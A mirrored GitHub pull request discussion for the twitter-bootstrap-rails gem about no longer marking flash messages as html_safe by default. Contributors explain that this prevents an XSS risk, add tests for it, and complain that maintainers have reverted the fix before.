search

seyhunak / twitter-bootstrap-rails

Twitter Bootstrap for Rails 6.0, Rails 5 - Rails 4.x Asset Pipeline
https://github.com/seyhunak/twitter-bootstrap-rails
4.5k stars 999 forks source link

Not marking msg as html_safe by default. #868

Closed panmari closed 8 years ago

panmari commented 8 years ago

This could be misused as attack vector for xss attacks. Added two tests for checking the behavior in both cases: if user escapes message or not.

See also #856

symmetriq commented 8 years ago

:+1:

The maintainers of this project need to stop flip-flopping on this issue. This was fixed on March 24, 2014 (commit), and applied to the Bootstrap 3 branch on April 1, 2014 (commit). On Dec 12, 2014 (commit), someone else came along and just re-added html_safe (seemingly oblivious to the fact that it was removed for a reason), and it went right back in without anybody questioning it.

At this point I'm now considering dropping this gem from the app I work on, but for the sake of people who still use it, this fix needs to go back in.

claudiob commented 8 years ago

@symmetriq In case you need an alternative, you might want to look at http://fullscreen.github.io/bh

panmari commented 8 years ago

Maybe now that I've added tests that mention the xss issue there, people will be more hesitant to revert the change...

On Sat, Aug 8, 2015, 09:10 Claudio B. notifications@github.com wrote:

@symmetriq https://github.com/symmetriq In case you need an alternative, you might want to look at http://fullscreen.github.io/bh

— Reply to this email directly or view it on GitHub https://github.com/seyhunak/twitter-bootstrap-rails/pull/868#issuecomment-128925777 .